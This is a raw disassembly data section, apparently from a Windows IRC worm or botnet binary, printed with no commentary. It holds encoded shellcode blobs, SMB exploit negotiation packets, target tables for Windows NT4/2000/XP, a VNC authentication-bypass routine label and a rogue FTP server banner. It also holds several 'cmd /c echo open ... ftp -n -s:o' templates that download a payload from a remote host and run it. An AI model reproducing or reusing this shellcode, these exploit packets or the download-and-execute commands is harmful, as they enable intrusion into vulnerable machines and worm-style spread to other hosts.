dd 1AC6C091h, 7BDC9D5Eh, 0C7C6C070h, 0DF125412h, 485A9ABDh
dd 0AA589A78h, 9112FF50h, 9A85DF12h, 9B78585Ah, 9912589Ah
dd 63125A9Ah, 5F1A6E12h, 0F3491297h, 0E571C09Ah, 1A999999h
dd 0CFCB945Fh, 0C365CE66h, 9DF34112h, 99F071C0h, 0C9C99999h
dd 98F3C9C9h, 0CE669BF3h, 5E411269h, 9E999B9Eh, 1059AA24h
dd 89F39DDEh, 0CE66CACEh, 0CA98F36Dh, 0C961CE66h, 0CE66CAC9h
dd 0DD751A65h, 42AA6D12h, 10C089F3h, 627B1785h, 10A1DF10h
dd 0DF10A5DFh, 0B5DF5ED9h, 99999898h, 0C989DE14h, 0CACACACFh
dd 0CACA98F3h, 0FAA5DE5Eh, 1499FDF4h, 0CAC9A5DEh, 0C97DCE66h
dd 0AA71CE66h, 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h
dd 5A59AA77h, 66676271h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h
dd 99EAEAFCh, 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh
dd 0C9EDF0E1h, 0FCFAF6EBh, 0D599EAEAh, 0D5FDF8F6h, 0F8EBFBF0h
dd 99D8E0EBh, 0C6ABEAEEh, 0CE99ABAAh, 0F6CAD8CAh, 0EDFCF2FAh
dd 0F0FB99D8h, 0F599FDF7h, 0FCEDEAF0h, 0FAF899F7h, 0EDE9FCFAh
dd 99h
; char asc_4495D8[]
asc_4495D8 db '-' ; DATA XREF: sub_40BCE2+11�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aExploitStatist db 'Exploit Statistics:',0
; char asc_4495F8[]
asc_4495F8 db ' ' ; DATA XREF: sub_40BCE2+46�o
db 3, 37h, 25h
dd 203A0373h, 2C6425h
; char aTotalDInS_[]
aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: sub_40BCE2+86�o
align 4
; char asc_449618[]
asc_449618 db '-' ; DATA XREF: sub_40BDB1+38�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
db 54h ; T
db 72h, 61h, 6Eh
db 73h ; s
db 66h, 65h, 72h
db 20h
db 53h, 74h, 61h
db 74h ; t
db 69h, 73h, 74h
db 69h ; i
db 63h, 73h, 3Ah
db 20h
db 2, 54h, 46h
db 54h ; T
db 50h, 2, 3Ah
db 20h
db 25h, 64h, 2Ch
db 20h
db 2, 46h, 54h
db 50h ; P
db 2, 3Ah, 20h
aDTotalDInS_ db '%d, Total %d in %s.',0
; char asc_449660[]
asc_449660 db '-' ; DATA XREF: sub_40BE1D+22�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aDConnectbackSh db '%d connectback shells in %s.',0
align 4
; char asc_44968C[]
asc_44968C db '-' ; DATA XREF: sub_40BE72+14�o
db 3, 34h, 2
dd 6E616373h, 202D0302h, 6C707845h, 2074696Fh, 7473694Ch
dd 3Ah
; char asc_4496A8[]
asc_4496A8 db ' ' ; DATA XREF: sub_40BE72+40�o
db 3, 37h, 25h
dd 28200373h, 73253403h, 2C2903h
; char aScanTimeS_[]
aScanTimeS_ db ' Scan Time: %s.',0 ; DATA XREF: sub_40BE72+7F�o
; char asc_4496C8[]
asc_4496C8 db '-' ; DATA XREF: sub_40BF39+80�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
db 2Dh, 20h, 74h
db 72h ; r
db 79h, 69h, 6Eh
db 67h ; g
db 20h, 2, 25h
db 73h ; s
db 2, 20h, 6Fh
aNSPortD___ db 'n %s (port %d)...',0
align 4
; char asc_4496F8[]
asc_4496F8 db '-' ; DATA XREF: sub_40BF39+172�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aFinishedExploi db '- finished exploiting %s (%d attempts)',0
; char asc_44972C[]
asc_44972C db '-' ; DATA XREF: sub_40C0EE+2C�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aCurrentIpS_ db 'Current IP: %s.',0
; char asc_449748[]
asc_449748 db '-' ; DATA XREF: sub_40C0EE+42�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanNotActive_ db 'Scan not active.',0
align 4
; char asc_449768[]
asc_449768 db '-' ; DATA XREF: sub_40C165+DA�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aServerStarte_2 db ' Server started on Port: %d, File: %s.',0
align 4
; char asc_44979C[]
asc_44979C db '-' ; DATA XREF: sub_40C165+148�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_35 db ' Failed to start server, error: <%d>.',0
align 10h
; char asc_4497D0[]
asc_4497D0 db '-' ; DATA XREF: sub_40C165+1FE�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 64h
db 2
db 3, 2Dh, 20h
aServerStarte_3 db 'Server started on Port: %d, File: %s.',0
align 4
; char asc_449804[]
asc_449804 db '-' ; DATA XREF: sub_40C165+26C�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 64h
db 2
db 3, 2Dh, 20h
aFailedToSta_36 db 'Failed to start server, error: <%d>.',0
align 4
; char asc_449838[]
asc_449838 db '-' ; DATA XREF: sub_40C165+321�o
db 3, 34h, 2
db 63h ; c
db 6Fh, 2 dup(6Eh)
db 65h ; e
db 63h, 74h, 62h
db 61h ; a
db 63h, 6Bh, 2
db 3
aServerStarte_4 db '- Server started on Port: %d.',0
align 4
; char asc_449868[]
asc_449868 db '-' ; DATA XREF: sub_40C165+38F�o
db 3, 34h, 2
db 63h ; c
db 6Fh, 2 dup(6Eh)
db 65h ; e
db 63h, 74h, 62h
db 61h ; a
db 63h, 6Bh, 2
db 3
aFailedToSta_37 db '- Failed to start server, error: <%d>.',0
; char asc_4498A0[]
asc_4498A0 db '-' ; DATA XREF: sub_40C165+449�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aServerListen_1 db ' Server listening on IP: %s:%d, Directory: %s\.',0
; char asc_4498DC[]
asc_4498DC db '-' ; DATA XREF: sub_40C165+4B7�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_38 db ' Failed to start server, error: <%d>.',0
align 10h
; char aD_D_D_D_0[]
aD_D_D_D_0 db '%d.%d.%d.%d',0 ; DATA XREF: sub_40C683+38�o
aSocketOpenFail db 'socket open failed',0 ; DATA XREF: .text:0040C8B1�o
align 10h
aSendtoSocketFa db 'sendto() socket failed. sent = %d <%d>.',0 ; DATA XREF: .text:0040C8E8�o
aRecvfromSocket db 'recvfrom() socket failed',0 ; DATA XREF: .text:0040C942�o
align 4
aSocketOpen_ db 'Socket open.',0 ; DATA XREF: .text:0040C967�o
align 4
aSocketClosed_ db 'Socket closed.',0 ; DATA XREF: .text:loc_40C977�o
align 4
; char asc_449994[]
asc_449994 db '-' ; DATA XREF: sub_40C989+93�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aIpSDScanThread db 'IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0
; char asc_4499CC[]
asc_4499CC db '-' ; DATA XREF: sub_40C989+EE�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aIpSPortDIsOpen db 'IP: %s, Port %d is open.',0
align 4
; char asc_4499F4[]
asc_4499F4 db '-' ; DATA XREF: sub_40CBA1+87�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToInitia db 'Failed to initialize critical section.',0
align 4
; char asc_449A28[]
asc_449A28 db '-' ; DATA XREF: sub_40CBA1+103�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aSDScanThreadDS db '%s:%d, Scan thread: %d, Sub-thread: %d.',0
; char asc_449A5C[]
asc_449A5C db '-' ; DATA XREF: sub_40CBA1+173�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToStartW db 'Failed to start worker thread, error: <%d>.',0
; char asc_449A94[]
asc_449A94 db '-' ; DATA XREF: sub_40CBA1+1CE�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFinishedAtSDAf db 'Finished at %s:%d after %d minute(s) of scanning.',0
align 4
; char asc_449AD4[]
asc_449AD4 db '-' ; DATA XREF: sub_40CE00+92�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aIpSPortDIsOp_0 db 'IP: %s Port: %d is open.',0
align 4
; char asc_449AFC[]
asc_449AFC db '-' ; DATA XREF: sub_40CECD+41�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanningIpSPor db 'Scanning IP: %s, Port: %d.',0
align 4
; char asc_449B24[]
asc_449B24 db '-' ; DATA XREF: sub_40CFBE+41�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanningIpSP_0 db 'Scanning IP: %s, Port: %d.',0
align 10h
; char asc_449B50[]
asc_449B50 db '-' ; DATA XREF: sub_40CFBE+D1�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFinishedScanni db 'Finished scanning IP: %s.',0
align 4
aRbrbrbrb db 'BBBB',0 ; DATA XREF: sub_40D36D+B2�o
align 4
dword_449B88 dd 10FF8h, 0 ; DATA XREF: sub_40D36D+6A�o
dword_449B90 dd 10FF8h ; DATA XREF: sub_40D36D+79�o
dword_449B94 dd 7FFDF020h, 0 ; DATA XREF: sub_40D36D+162�o
dword_449B9C dd 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_40D797+7B�o
dd 13370000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0 db 'LANMAN1.0',0
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002 db 'LM1.2X002',0
dw 4C02h
aAnman2_1 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12 db ' LM 0.12',0
align 4
dword_449C24 dd 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_40D797+34�o
dd 13370000h, 0
dd 0FF0Ch, 0A110400h, 2 dup(0)
dword_449C54 dd 0 ; DATA XREF: sub_40D797+44�o
dd 800000D4h, 0
unk_449C60 db 81h ; ; DATA XREF: sub_40D871+A�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
dd 0
byte_449CAC db 41h ; DATA XREF: sub_40D90F+FF�r
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 10h
aSvwfbA db 'SVWf',0 ; DATA XREF: sub_40DB44+82�o
aIcsa db '',0
db 2 dup(0), 0FFh
dd 12096836h, 0F7E863D6h, 89000000h, 0A2E80846h, 0FF000000h
dd 6B680476h, 0E8CA2BD0h, 0E2h, 0E80C4689h, 3Fh, 680476FFh
dd 4C0297FAh, 0CDE8h, 68DB3100h, 410h, 89D0FF53h, 768B56C3h
dd 0B9C78910h, 410h, 315EA4F3h, 505050C0h, 0FF505053h
dd 468B0C56h, 0C4816608h, 5E5F0080h, 60E0FF5Bh, 23E8h
dd 24448B00h, 7C588D0Ch, 53C4383h, 284381h, 81000010h
dd 0F0002863h, 48BFFFFh, 14C48324h, 0C3C03150h, 0FF64D231h
dd 22896432h, 90B8DB31h, 31429042h, 8902B1C9h, 74AFF3DFh
dd 0F3EB4303h, 64107E89h, 6158028Fh, 20BF60C3h, 8B7FFDF0h
dd 8468B1Fh, 7F8B0789h, 78C781F8h, 89000001h, 741939F9h
dd 0EB098B04h, 39FA89F8h, 574045Ah, 0EB04528Bh, 891189F6h
dd 43C6044Ah, 0C36101FDh, 0FDF00CA1h, 1C408B7Fh, 8908588Bh
dd 8B008B1Eh, 46890840h, 8B60C304h, 8B28246Ch, 548B3C45h
dd 0EA017805h, 8B184A8Bh, 0EB01205Ah, 8B4938E3h, 0EE018B34h
dd 0C031FF31h, 0E038ACFCh, 0CFC10774h, 0EBC7010Dh, 247C3BF4h
dd 8BE17524h, 0EB01245Ah, 4B0C8B66h, 11C5A8Bh, 8B048BEBh
dd 4489E801h, 0C2611C24h, 0FEEB0008h, 0
dword_449E58 dd 0F254C481h, 0E8FCFFFFh, 46h, 8B3C458Bh, 178057Ch, 184F8BEFh
; DATA XREF: sub_40DB44+30�o
dd 1205F8Bh, 492EE3EBh, 18B348Bh, 99C031EEh, 74C084ACh
dd 0DCAC107h, 0F4EBC201h, 424543Bh, 5F8BE375h, 66EB0124h
dd 8B4B0C8Bh, 0EB011C5Fh, 18B1C8Bh, 245C89EBh, 0C031C304h
dd 30408B64h, 0F78C085h, 8B0C408Bh, 8BAD1C70h, 0BE90868h
dd 8B000000h, 7C053440h, 8B000000h, 315F3C68h, 0EB5660F6h
dd 0CEEF680Dh, 986860E0h, 570E8AFEh, 0EEE8E7FFh, 0FFFFFFh
dword_449EE8 dd 23h ; DATA XREF: sub_40D312+1B�o
; char dword_449EEC[]
dword_449EEC dd 909006EBh, 90909090h, 0 ; DATA XREF: sub_40D36D+E8�o
; char aCccc[]
aCccc db 'CCCC',0 ; DATA XREF: sub_40D36D+153�o
align 10h
dword_449F00 dd 3 ; DATA XREF: sub_40D36D+246�o
; char dword_449F04[]
dword_449F04 dd 0A1h ; DATA XREF: sub_40D36D+29F�o
; char dword_449F08[]
dword_449F08 dd 30h ; DATA XREF: sub_40D36D+2CA�o
; char dword_449F0C[]
dword_449F0C dd 62B0606h, 2050501h, 0A0h ; DATA XREF: sub_40D36D+2F5�o
; char dword_449F18[]
dword_449F18 dd 60h ; DATA XREF: sub_40D36D+320�o
; char aCmdCEchoOpenSD[]
aCmdCEchoOpenSD db 'cmd /c echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &'
; DATA XREF: sub_40DB44+57�o
db 'echo quit >> o &ftp -n -s:o &%s',0Dh,0Ah,0
align 10h
dword_449F80 dd 0E983C933h, 0D9EED9AFh, 5BF42474h, 0BB137381h, 836AD31Eh
; DATA XREF: sub_40E3FF+2B3�o
dd 0F4E2FCEBh, 25387447h, 952CE753h, 6587E44h, 2F583A9Fh
dd 6FAF9587h, 0E13C1FC3h, 355806F4h, 89381F9Bh, 5E58578Bh
dd 5B3D1F30h, 0EE7F877Bh, 0ABD46A7Bh, 0A8D21371h, 3EE8EA50h
dd 89A6369Fh, 6BF74130h, 66587850h, 768C95F0h, 46D0F5BAh
dd 4EBF9730h, 5B107FA7h, 2A587A7Bh, 6693958Bh, 0C7CF6E30h
dd 34DB5E30h, 649D90D3h, 0BC2C4E57h, 39B5C58Ah, 58E076DDh
dd 58A069D3h, 0BA2C4AE4h, 963ED5D3h, 0BC2C4E80h, 0C3697E4h
dd 68DBF33Ah, 95D174EEh, 630A766Bh, 9584B34Eh, 39804D6Dh
dd 39904DE8h, 0BA2C4DF8h, 0FD376DDh, 8B5A4DDDh, 7077762Eh
dd 9584D9CBh, 3BC3746Dh, 203E1EEh, 83FDB31Fh, 3905E1ECh
dd 203E1EEh, 2355575Eh, 3A05E1ECh, 95864AEFh, 8DBB8D6Bh
dd 3DAAD8C2h, 9586C844h, 0EB9786Bh, 7B076DDh, 3AB9FB32h
dd 0E31F37E2h, 0E397745Ch, 99132F59h, 4791E011h, 0F9FF5C45h
dd 0C1EB6436h, 18BBB510h, 95C5AD45h, 0BC2C5ACEh, 3B8149E0h
dd 6BB94FEAh, 3B864FEAh, 0C7BBCE44h, 391D1B62h, 95B9C844h
dd 0BA2C2944h, 0E92F4930h, 0BC2C7A7Fh, 203E1E9h, 0A33D054h
dd 9505E1E8h, 6AD31E6Bh, 0
dword_44A0E0 dd 0EFFFC481h, 44FFFFh ; DATA XREF: sub_40E3FF+29A�o
dd offset aWindowsNt42000 ; "Windows NT4, 2000 (SP0-SP4)"
dword_44A0EC dd 42Ah ; DATA XREF: sub_40E3FF+24D�r
dword_44A0F0 dd 3E8h ; DATA XREF: sub_40E3FF+2BE�r
dword_44A0F4 dd 258h ; DATA XREF: sub_40E3FF+290�r
byte_44A0F8 db 1 ; DATA XREF: sub_40E3FF+1F9�r
; sub_40E3FF+2C7�r
align 4
dd offset aWindowsXpSp0Sp ; "Windows XP (SP0+SP1)"
dd 2C6h, 264h, 0
dd 1
dword_44A110 dd 20804h ; DATA XREF: sub_40E303�r
; sub_40E3FF+2E5�o ...
aWindowsNt42000 db 'Windows NT4, 2000 (SP0-SP4)',0 ; DATA XREF: .data:0044A0E8�o
aWindowsXpSp0Sp db 'Windows XP (SP0+SP1)',0 ; DATA XREF: .data:0044A0FC�o
align 4
; char a__6[]
a__6 db '.',0 ; DATA XREF: sub_40E3FF+10�o
align 4
; char aSIpc[]
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_40E3FF+33�o
align 4
; char aSPipeBrowser[]
aSPipeBrowser db '\\%s\pipe\browser',0 ; DATA XREF: sub_40E3FF+84�o
align 4
dword_44A16C dd 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh, 0 ; DATA XREF: sub_40E3FF+F5�o
dword_44A180 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 0 ; DATA XREF: sub_40E3FF+151�o
dword_44A194 dd 2EBh, 0 ; DATA XREF: sub_40E3FF+221�o
; char aCmdCEchoOpen_0[]
aCmdCEchoOpen_0 db 'cmd /c echo open %s %d >> ii &echo user 1 1 >> ii &echo get %s >>'
; DATA XREF: sub_40E907+92�o
db ' ii &echo bye >> ii &ftp -n -v -s:ii &del ii &%s',0Dh,0Ah,0
dword_44A210 dd 200F1001h, 0Ah, 1001802h, 0 ; DATA XREF: sub_40EB60+5A�o
dd 14002400h, 0D9D2C9B7h, 34EF333Eh, 431F25h, 2F5C0202h
dd 3Fh dup(61616161h), 62616161h, 40h dup(62626262h), 22220101h
dd 3Fh dup(22222222h), 1222222h, 64646401h, 3Fh dup(64646464h)
dd 1016464h, 40h dup(65656565h), 66010165h, 40h dup(66666666h)
dd 67670101h, 3Fh dup(67676767h), 1676767h, 68686801h
dd 3Fh dup(68686868h), 1016868h, 40h dup(69696969h), 6A010169h
dd 40h dup(6A6A6A6Ah), 6B6B0101h, 3Fh dup(6B6B6B6Bh), 16B6B6Bh
dd 6C6C6C01h, 8 dup(6C6C6C6Ch), 41416C6Ch, 100D06EBh, 6D6D501Eh
dd 0E983C933h, 0D9EED9B0h, 5BF42474h, 0C8137381h, 83877FD9h
dd 0F4E2FCEBh, 0CA94B334h, 78802020h, 0EBF4B937h, 0C2F4FDECh
dd 820352F4h, 0C90D8B0h, 0D8F4C187h, 0CE94D8E8h, 86F4ED43h
dd 1EBFE826h, 0F3BF5D64h, 8AB518CFh, 73941BC9h, 0AF5B8DF3h
dd 0D8F43CBDh, 0E194D8ECh, 0C34D543h, 6C7EC597h, 0EF4F5CBh
dd 0E663FDA4h, 0E3A4E80Bh, 0C4F9A43h, 0F7F4D588h, 0C7F474D4h
dd 91787C0h, 0D793D786h, 0D4190F37h, 0B54CB1AEh, 0B50CAEA0h
dd 57808D97h, 7B9212A0h, 518089F3h, 0E19A5097h, 85773449h
dd 787DB39Dh, 8EA6B118h, 7828743Dh, 0D42C8A1Eh, 0D43C8A9Bh
dd 57808A8Bh, 0EC5EB1AEh, 66F68AAEh, 9DDBB15Dh, 78281EB8h
dd 0D66FB31Eh, 0EFAF269Dh, 6E51746Ch, 0D4A9269Fh, 0EFAF269Dh
dd 0CEF9902Dh, 0D7A9269Fh, 782A8D9Ch, 60174A18h, 0D0061FB1h
dd 782A0F37h, 0E315BF18h, 0EA1CB1AEh, 0D7153C41h, 0EB3F091h
dd 0E3BB32Fh, 74BFE82Ah, 0AA3D2762h, 14539B36h, 2C47A345h
dd 0F5177263h, 78696A36h, 51809DBDh, 0D62D8E93h, 86158899h
dd 0D62A8899h, 2A170937h, 0D4B1DC11h, 78150F37h, 5780EE37h
dd 4838E43h, 5180BD0Ch, 0EFAF269Ah, 0D87B5338h, 78A9269Bh
dd 877FD918h
aMmmmmmmmmmmmmm db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm',0
align 4
; char aCmdCEchoOpen_1[]
aCmdCEchoOpen_1 db 'cmd /c echo open %s %d >> ii &echo user 1 1 >> ii &echo get %s >>'
; DATA XREF: sub_40EA49+92�o
db ' ii &echo bye >> ii &ftp -n -v -s:ii &del ii &%s',0Dh,0Ah,0
word_44B498 dw 1 ; DATA XREF: sub_40EC96+A�r
align 4
; char aRfb03d_03d[]
aRfb03d_03d db 'RFB %03d.%03d',0Ah,0 ; DATA XREF: sub_40EC96+93�o
align 4
; char aVncD_DSSAuthby[]
aVncD_DSSAuthby db 'VNC%d.%d %s: %s - [AuthBypass]',0 ; DATA XREF: sub_40EC96+1FC�o
align 4
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_40EFAC+130�o
; char aEchoOpenSDOEch[]
aEchoOpenSDOEch db 'echo open %s %d >> o&echo user 1 >>o &echo 1 >>o &echo get %s >>o'
; DATA XREF: sub_40F198+23E�o
db ' &echo bye >>o &ftp -n -s:o &del /F /Q o &%s',0Dh,0Ah,0
a220Stnyftpd0wn db '220 StnyFtpd 0wns j0',0Ah,0 ; DATA XREF: sub_40F43A+1C9�o
align 4
; char aSS_3[]
aSS_3 db '%s %s',0 ; DATA XREF: sub_40F43A+251�o
align 4
; char aUser_1[]
aUser_1 db 'USER',0 ; DATA XREF: sub_40F43A+262�o
align 4
a331PasswordReq db '331 Password required',0Ah,0 ; DATA XREF: sub_40F43A+277�o
align 4
; char aPass[]
aPass db 'PASS',0 ; DATA XREF: sub_40F43A+287�o
align 4
a230UserLoggedI db '230 User logged in.',0Ah,0 ; DATA XREF: sub_40F43A+29B�o
align 4
; char aSyst[]
aSyst db 'SYST',0 ; DATA XREF: sub_40F43A+2AB�o
align 4
a215Stnyftpd db '215 StnyFtpd',0Ah,0 ; DATA XREF: sub_40F43A+2BF�o
align 4
; char aRest[]
aRest db 'REST',0 ; DATA XREF: sub_40F43A+2CF�o
align 4
a350Restarting_ db '350 Restarting.',0Ah,0 ; DATA XREF: sub_40F43A+2E3�o
align 4
; char off_44B5D8[]
off_44B5D8 dd offset off_445750 ; DATA XREF: sub_40F43A+2F3�o
a257IsCurrentDi db '257 "/" is current directory.',0Ah,0 ; DATA XREF: sub_40F43A+307�o
align 4
; char aType[]
aType db 'TYPE',0 ; DATA XREF: sub_40F43A+317�o
align 4
; char aA_0[]
aA_0: ; DATA XREF: sub_40F43A+32E�o
unicode 0, <A>,0
a200TypeSetToA_ db '200 Type set to A.',0Ah,0 ; DATA XREF: sub_40F43A+342�o
; char aType_0[]
aType_0 db 'TYPE',0 ; DATA XREF: sub_40F43A+352�o
align 4
; char aI[]
aI: ; DATA XREF: sub_40F43A+369�o
unicode 0, <I>,0
a200TypeSetToI_ db '200 Type set to I.',0Ah,0 ; DATA XREF: sub_40F43A+37D�o
; char aPasv[]
aPasv db 'PASV',0 ; DATA XREF: sub_40F43A+38D�o
align 4
a425PassiveNotS db '425 Passive not supported on this server',0Ah,0
; DATA XREF: sub_40F43A+3A0�o
align 10h
; char aList_0[]
aList_0 db 'LIST',0 ; DATA XREF: sub_40F43A+3DB�o
align 4
a226TransferCom db '226 Transfer complete',0Ah,0 ; DATA XREF: sub_40F43A+3EE�o
align 10h
; char aPort[]
aPort db 'PORT',0 ; DATA XREF: sub_40F43A+41C�o
align 4
; char aS_24[]
aS_24 db '%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^',0Ah ; DATA XREF: sub_40F43A+455�o
db ']',0
; char aXX[]
aXX db '%x%x',0Ah,0 ; DATA XREF: sub_40F43A+499�o
align 4
; char aS_S_S_S[]
aS_S_S_S db '%s.%s.%s.%s',0 ; DATA XREF: sub_40F43A+4CC�o
a200PortCommand db '200 PORT command successful.',0Ah,0 ; DATA XREF: sub_40F43A+4DD�o
align 4
; char aRetr[]
aRetr db 'RETR',0 ; DATA XREF: sub_40F43A+4F2�o
align 4
a150OpeningBina db '150 Opening BINARY mode data connection',0Ah,0
; DATA XREF: sub_40F43A+50A�o
align 4
; char aFtpTransferSta[]
aFtpTransferSta db 'ftp transfer started to: %s',0 ; DATA XREF: sub_40F43A+533�o
a226TransferC_0 db '226 Transfer complete.',0Ah,0 ; DATA XREF: sub_40F43A+57D�o
; char aFtpTransferCom[]
aFtpTransferCom db 'ftp transfer complete to: %s',0 ; DATA XREF: sub_40F43A+58F�o
align 4
a425CanTOpenDat db '425 Can',27h,'t open data connection.',0Ah,0
; DATA XREF: sub_40F43A+5E0�o
align 10h
; char aQuit_1[]
aQuit_1 db 'QUIT',0 ; DATA XREF: sub_40F43A+5ED�o
align 4
a221GoodbyeHapp db '221 Goodbye happy r00ting.',0Ah,0 ; DATA XREF: sub_40F43A+601�o
; char aRb[]
aRb db 'rb',0 ; DATA XREF: sub_40FAEE+24�o
align 4
; char aGet_0[]
aGet_0 db 'GET ',0 ; DATA XREF: sub_40FB88+26F�o
align 10h
; char asc_44B7D0[]
asc_44B7D0: ; DATA XREF: sub_40FB88+292�o
unicode 0, < >,0
; char asc_44B7D4[]
asc_44B7D4: ; DATA XREF: sub_40FB88+297�o
unicode 0, < >,0
; char aGet_1[]
aGet_1 db 'GET ',0 ; DATA XREF: sub_40FB88+2A2�o
align 10h
; char asc_44B7E0[]
asc_44B7E0 db 0Dh,0Ah,0 ; DATA XREF: sub_40FB88+2D5�o
align 4
; char asc_44B7E4[]
asc_44B7E4 db '-' ; DATA XREF: sub_40FB88+3FE�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aServerFailedRe db ' server failed, returned %d',0
aTextHtml db 'text/html',0 ; DATA XREF: sub_40FFE9+5F�o
align 4
; char aApplicationOct[]
aApplicationOct db 'application/octet-stream',0 ; DATA XREF: sub_40FFE9:loc_41004F�o
align 4
